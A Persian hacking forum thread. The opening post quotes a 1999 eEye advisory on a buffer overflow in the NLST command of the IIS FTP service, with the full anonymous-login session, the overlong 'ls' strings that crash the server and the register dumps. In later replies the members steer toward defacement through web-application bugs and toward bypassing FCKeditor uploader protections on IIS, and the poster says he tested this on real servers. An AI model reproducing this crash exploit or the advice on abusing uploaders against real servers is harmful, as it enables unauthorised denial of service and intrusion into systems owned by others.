صفحه 1 از 2 12 آخرینآخرین
نمایش نتایج: از شماره 1 تا 15 , از مجموع 23
  1. #1
    تاریخ عضویت
    Sep 2004
    نوشته ها
    69
    تشکر از ارسال
    2
    Thanked 1 Time in 1 Post

    FTP MICROSOFT SERVICE ATtAck

    با سلام کسی می تونه بگه اون command دقیقا چیکار می کنه و بعدش باید چیکار کرد؟

    کد PHP:
    IIS Remote FTP Exploit/DoS Attack

    Systems Affected
    :
    Windows NT 4.0 (SP4IIS 3.0 4.0
    Windows 95
    /98 PWS 1.0

    Release Date
    :
    SundayJanuary 241999

    Advisory Code
    :
    IISE01

    De******ion
    :

    While 
    feeding in logic into Retina's artificial intelligence
    engine, which helps construct query strings to pass to
    internet servers, checking for overflow bugs and miss
    parsing of command strings. Our test server stopped
    responding. Below is our findings.

    Microsoft IIS (Internet Information Server) FTP service
    contains a buffer overflow in the NLST command. This could
    be used to DoS a remote machine and in some cases
    execute code remotely.

    Lets look at the following example attack. The server must
    either have anonymous access rights or an attacker must
    have an account. FTP Session was initiated from an NT
    Machine.


    C:\>ftp guilt.xyz.com
    Connected to guilt.xyz.com.
    220 GUILT Microsoft FTP Service (Version
    4.0).
    User (marc.xyz.com:(none)): ftp
    331 Anonymous access allowed, send identity
    (e-mail name) as password.
    Password:
    230 Anonymous user logged in.

    ftp> ls AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAA

    200 PORT command successful.
    150 Opening ASCII mode data connection for
    file list.

    [The server has now processed our long NLST request and
    has crashed]

    -> ftp: get :Connection reset by peer
    [Our ftp client looses connection... that
    is a given]

    The above example uses 316 characters to overflow. This is
    the smallest possible buffer to pass that will overflow IIS.
    Lets take a look at the server side happenings.

    On the server side we have an "Application Error" message
    for inetinfo.exe. "The instruction at '
    0x710f8aa2' referenced
    memory at '
    0x41414156'. The memory could not be 'read'." If
    we take a look at our registers we will see the following:

    EAX = 0000005C EBX = 00000001
    ECX = 00D3F978 EDX = 002582DD
    ESI = 00D3F978 EDI = 00000000
    EIP = 710F8AA2 ESP = 00D3F644
    EBP = 00D3F9F0 EFL = 00000206

    There is no 41 hex (Our overflow character) in any of our
    registers so we chalk this up as a DoS attack for now.

    Lets move on and take a look at the largest string we can
    pass to overflow IIS.

    C:\>ftp guilt.xyz.com
    Connected to guilt.xyz.com.
    220 GUILT Microsoft FTP Service (Version
    4.0).
    User (marc.xyz.com:(none)): ftp
    331 Anonymous access allowed, send identity
    (e-mail name) as password.
    Password:
    230 Anonymous user logged in.

    ftp> ls AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAA

    200 PORT command successful.
    150 Opening ASCII mode data connection for
    file list.
    Connection closed by remote host.

    In this case we passed 505 characters to overflow IIS. This
    is the largest possible (tested) buffer to pass that will
    overflow IIS. Lets take a look once again at the server side.

    On the server we have the same "Application Error"
    message for inetinfo.exe except this time "The instruction at
    '
    0x722c9262' referenced memory at "0x41414141'." This is
    looking mighty interesting. Lets look at our registers once
    again:

    EAX = 00000000 EBX = 41414141
    ECX = 41414141 EDX = 722C1CAC
    ESI = 41414141 EDI = 41414141
    EIP = 722C9262 ESP = 00D3F524
    EBP = 00D3F63C EFL = 00000246

    There sure are a lot of 41 hex codes in our registers now.

    So to wrap it all up what we have here is a DoS attack
    against any IISserver with ftp access. Keep in mind we have
    to be able to login. However, Anonymous access is granted
    on most servers. Once we have overflowed IIS all IIS
    services will fail. (I.E. The web service, NNTP, SMTP etc..)
    What we have seems to be a very interesting buffer overflow.


    Special Thanks

    The eEye Digital Security Team would like to extend a
    special thanks to Mudge and Dildog.

    Copyright (c) 1999 eEye Digital Security Team

    Permission is hereby granted for the redistribution of this
    alert electronically. It is not to be edited in any way without
    express consent of eEye. If you wish to reprint the whole or
    any part of this alert in any other medium excluding
    electronic medium, please e-mail [email protected] for
    permission.

    Disclaimer:

    The information within this paper may change without notice.
    Use of this information constitutes acceptance for use in an
    AS IS condition. There are NO warranties with regard to this
    information. In no event shall the author be liable for any
    damages whatsoever arising out of or in connection with the
    use or spread of this information. Any use of this information
    is at the user's own risk.

    Please send suggestions, updates, and comments to: 

    eEye Digital Security Team
    http://www.eEye.com
    [email protected] 

  2. #2
    تاریخ عضویت
    Jan 2004
    محل سکونت
    IRAN
    نوشته ها
    4,999
    تشکر از ارسال
    831
    Thanked 586 Times in 225 Posts
    Iis 3 و 4 رو که خدا بیامرزه دیگه !!!!!
    یکم بروز باشید
    Emperor Hacking Team

    سکوت در جای جای مکتوبات مقدسشان به چشم می خورد و خیانتها در پی هم. اگر با آنها باشی چه خوب است.
    عاشقانه تو را بر مکتوباتشان می پذیرند و هنگامی که می خواهی با آنان نباشی ، خون تو را از آب چشمه های کوهستان گوارا تر می پندارند!

    آدرس توئیتر من:https://twitter.com/#!/iM4n_

    به صفحه شبگرد در فیسبوک بپیوندید
    http://www.facebook.com/groups/shabgard

    تیم Emperor عضو جدید میپذیرد ! برای اطلاعات بیشتر با خودم تماس بگیرید


  3. #3
    تاریخ عضویت
    May 2010
    نوشته ها
    70
    تشکر از ارسال
    12
    Thanked 0 Times in 0 Posts

    برادر ایمان که دقیق زد تو خال.
    اما کلا بی خیال IIS شی بهتره.
    دیگه باگ های Application با یه کامپایل کردن و ران کردن کار بده نیستن.
    باید Protection ها رو Bypass کنی، یه زمانی روی ویندوز 98 ، طرف Word بلد نبود، اکسپلویت های Overflow می دید، Shell می گرفت، الان دیگه از این خبر ها نیست.
    اگه شما قصد دیفیس کردن داری(که تو ایران همه عشق همین کارن) باگ های Web Application رو پیش بگیر(باگ های جدید، الان IIS6 داره ناپدید می شه، چه برسه به اینا)

  4. #4
    تاریخ عضویت
    Sep 2004
    نوشته ها
    69
    تشکر از ارسال
    2
    Thanked 1 Time in 1 Post
    نمی دونم چرا در مورد یه چیزی می پرسی یه چیز دیگه جواب می دن. در ضمن من عشق دیفیس نیستم حاجی.

  5. #5
    تاریخ عضویت
    Sep 2004
    نوشته ها
    69
    تشکر از ارسال
    2
    Thanked 1 Time in 1 Post
    از طریق FTP و یوزر anonymous روی FTP MICROSOFT
    IIS 6.0 میشه کاری کرد؟

  6. #6
    تاریخ عضویت
    Jan 2004
    محل سکونت
    IRAN
    نوشته ها
    4,999
    تشکر از ارسال
    831
    Thanked 586 Times in 225 Posts
    صرفا برای خود IIS 6 نه چیزی نداریم
    اما اینجوری بگم که

    با یوزر anonymouse
    اگر بتونی به یک سری فایل های روی سرور دسترسی پیدا کنی آره میشه خیلی کارا کرد که این خیلی کارا به خیلی چیزا بستگی داره

    بر فرض
    این یک سرور هاستینگ باشه
    یا یک وب سرور باشه با یک سایت
    شاید بتونی اطلاعات بعضی از فایل های سایت رو استخراج کنی !
    شاید بتونی فایل روی سرور قرار بدی

    خوب حالا خودت چی فکر میکنی ؟؟؟؟
    Emperor Hacking Team

    سکوت در جای جای مکتوبات مقدسشان به چشم می خورد و خیانتها در پی هم. اگر با آنها باشی چه خوب است.
    عاشقانه تو را بر مکتوباتشان می پذیرند و هنگامی که می خواهی با آنان نباشی ، خون تو را از آب چشمه های کوهستان گوارا تر می پندارند!

    آدرس توئیتر من:https://twitter.com/#!/iM4n_

    به صفحه شبگرد در فیسبوک بپیوندید
    http://www.facebook.com/groups/shabgard

    تیم Emperor عضو جدید میپذیرد ! برای اطلاعات بیشتر با خودم تماس بگیرید


  7. #7
    تاریخ عضویت
    Sep 2004
    نوشته ها
    69
    تشکر از ارسال
    2
    Thanked 1 Time in 1 Post
    فکر می کنم بدون کمک شما هیچ چیز ممکن نیست lol
    یه چیزه دیگه لینگ FCKeditoresham پیدا کردم اما چون IIS 6.0 نمی زاره فایل آپ کنم و سرور هاستیگ نیست حالا تو ftp دنبال چی بگردم

    اینست فکر من lol
    ویرایش توسط keyvan : 06-20-2010 در ساعت 07:58 AM

  8. #8
    تاریخ عضویت
    Sep 2004
    نوشته ها
    69
    تشکر از ارسال
    2
    Thanked 1 Time in 1 Post
    Xxxxxxxxxxxxxx
    ویرایش توسط keyvan : 06-20-2010 در ساعت 07:59 AM دلیل: in post Eshtebahi Dade Shod

  9. #9
    تاریخ عضویت
    Jan 2004
    محل سکونت
    IRAN
    نوشته ها
    4,999
    تشکر از ارسال
    831
    Thanked 586 Times in 225 Posts
    اگر connector های fck کار میکنن و Disable نشدن که دیگه تمومه !
    مقاله bypass آپلودر های سروش دلیلی رو بخون
    یاد میگیری چجوری روی IIS پروتکشن های آپلودر رو دور بزنی
    Emperor Hacking Team

    سکوت در جای جای مکتوبات مقدسشان به چشم می خورد و خیانتها در پی هم. اگر با آنها باشی چه خوب است.
    عاشقانه تو را بر مکتوباتشان می پذیرند و هنگامی که می خواهی با آنان نباشی ، خون تو را از آب چشمه های کوهستان گوارا تر می پندارند!

    آدرس توئیتر من:https://twitter.com/#!/iM4n_

    به صفحه شبگرد در فیسبوک بپیوندید
    http://www.facebook.com/groups/shabgard

    تیم Emperor عضو جدید میپذیرد ! برای اطلاعات بیشتر با خودم تماس بگیرید


  10. #10
    تاریخ عضویت
    Sep 2004
    نوشته ها
    69
    تشکر از ارسال
    2
    Thanked 1 Time in 1 Post
    ایمان اونو خوندم رو بعضی سرور ها تست کردم جواب داد اما اپلودر باید اجازه اپلود عکسو بده ادیتورش تا لود می شه این اررور می ده نمیزاده عکس هم اپلود کنم

    The server Didnt Send back a proper XML response. please contact your system administrator .

    XML request error: Forbiden (403)

  11. #11
    تاریخ عضویت
    Aug 2009
    نوشته ها
    4
    تشکر از ارسال
    0
    Thanked 0 Times in 0 Posts
    والا میخواستم اینو بگم که خودت گفتی کیوان جان . هر وقت سوالی بکنی اولین کسی که جواب بی ربط میده همین ایمان هستش . می خواد بدش بیاد میخواد بدش نیاد اما من خیلی ازش بدم میاد خیلی رک هم این موضوع رو میگم . الان میره چیز مالی میکنه که پست منو پاک کنن . lol

  12. #12
    تاریخ عضویت
    Dec 2005
    محل سکونت
    اصفهان
    نوشته ها
    4,931
    تشکر از ارسال
    1,770
    Thanked 1,401 Times in 345 Posts
    اصولا کسی میتونه این حرف را بزنه که یه کم پستاش بیشتر از 2 تا باشه و یا حداقل یکی از این 2 تا پستش یه مطلب مفیده بوده باشه.

  13. #13
    تاریخ عضویت
    Jan 2004
    محل سکونت
    IRAN
    نوشته ها
    4,999
    تشکر از ارسال
    831
    Thanked 586 Times in 225 Posts
    اولا که اینجا بقیه باید چیز مالی منو بکنن که تغییراتی اعمال بشه
    آخه خودم مدیر این بخش هستم


    بعدشم تا جایی که بشه راهنمایی میکنیم
    آموزش نمیدیم چون موضوع تکراری هست و بارها بحث شده

    اینجا محل رفع اشکال هست ! نه آموزش

    حالا لطف کنید جواب های بی ربط منو لیست کنین ببینم چقدرش بی ربط بوده

    این ریپلای های اینجا که عین خود جواب بوده....
    Emperor Hacking Team

    سکوت در جای جای مکتوبات مقدسشان به چشم می خورد و خیانتها در پی هم. اگر با آنها باشی چه خوب است.
    عاشقانه تو را بر مکتوباتشان می پذیرند و هنگامی که می خواهی با آنان نباشی ، خون تو را از آب چشمه های کوهستان گوارا تر می پندارند!

    آدرس توئیتر من:https://twitter.com/#!/iM4n_

    به صفحه شبگرد در فیسبوک بپیوندید
    http://www.facebook.com/groups/shabgard

    تیم Emperor عضو جدید میپذیرد ! برای اطلاعات بیشتر با خودم تماس بگیرید


  14. #14
    تاریخ عضویت
    Dec 2009
    نوشته ها
    104
    تشکر از ارسال
    94
    Thanked 3 Times in 2 Posts
    یه زمانی روی ویندوز 98 ، طرف Word بلد نبود، اکسپلویت های Overflow می دید، Shell می گرفت، الان دیگه از این خبر ها نیست.
    والا من هنوز word بلد نیستم

    وقتی 403 میده یعنی با اون user که الان هستی امکان upload نیست
    باید بگردی از طریق دیگه ای بزنی

    مقاله سروش هم خوبه اما بنظرم یکم قدیمی شده.کسی چیز update تری داره؟

  15. #15
    تاریخ عضویت
    Aug 2009
    نوشته ها
    4
    تشکر از ارسال
    0
    Thanked 0 Times in 0 Posts
    1. تعداد پست هام زیاد نیست . چه ربطی داره ؟ پست نمیدم چون جایی که ایمان ادمین باشه مشخصه چیه دیگه . اما بحث ها رو کمو بیش میبینم و واقعاً می خندم به پست های این دوستمون . شما حاضری یک تاپیک بزنم به نام سوتی های ایمان . بعد همه بیان تک تک رو کنن ؟ قول میدم سوتی ها رو هم از تو همین پست هایی که دادی بدم . که نشون بدم سواد شبکه نداری . در حد 0 . باور کن از روی دشمنی نمیگم . دوستانه میگم اگه این همه سال بجای اینکه حرف میزدی می نشستی می خوندی الان ccie هم گرفته بودی . اما در کل اگه حاضری بگو من تاپیک بزنم سوتی هاتو رو کنیم .

    سال ها دنبال حاشیه بودی و تو حاشیه هم میمونی . من هیچ وقط وارد حاشیه نشدم اما اینبار می خوام وارد حاشیه بشم چون واقعاً تحمل جناب عالی با این چرت و پرت هایی که میگی برام سخته .

 

 

موضوعات مشابه

  1. Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service
    توسط exploits در انجمن بخش هک و سکیوریتی
    پاسخ ها: 0
    آخرين نوشته: 09-16-2009, 02:15 PM
  2. اکسپلویت Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
    توسط Herkul در انجمن بخش کاربران / سوالات مبتدی
    پاسخ ها: 6
    آخرين نوشته: 08-25-2007, 11:18 PM
  3. MSSQL.c - Microsoft mssql 7.0 server denial of service attack exploit
    توسط b_ice در انجمن بخش هک و سکیوریتی
    پاسخ ها: 0
    آخرين نوشته: 10-02-2004, 02:53 AM
  4. Microsoft SSL Remote Denial of Service
    توسط bl2k در انجمن بخش هک و سکیوریتی
    پاسخ ها: 0
    آخرين نوشته: 04-18-2004, 11:07 AM

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •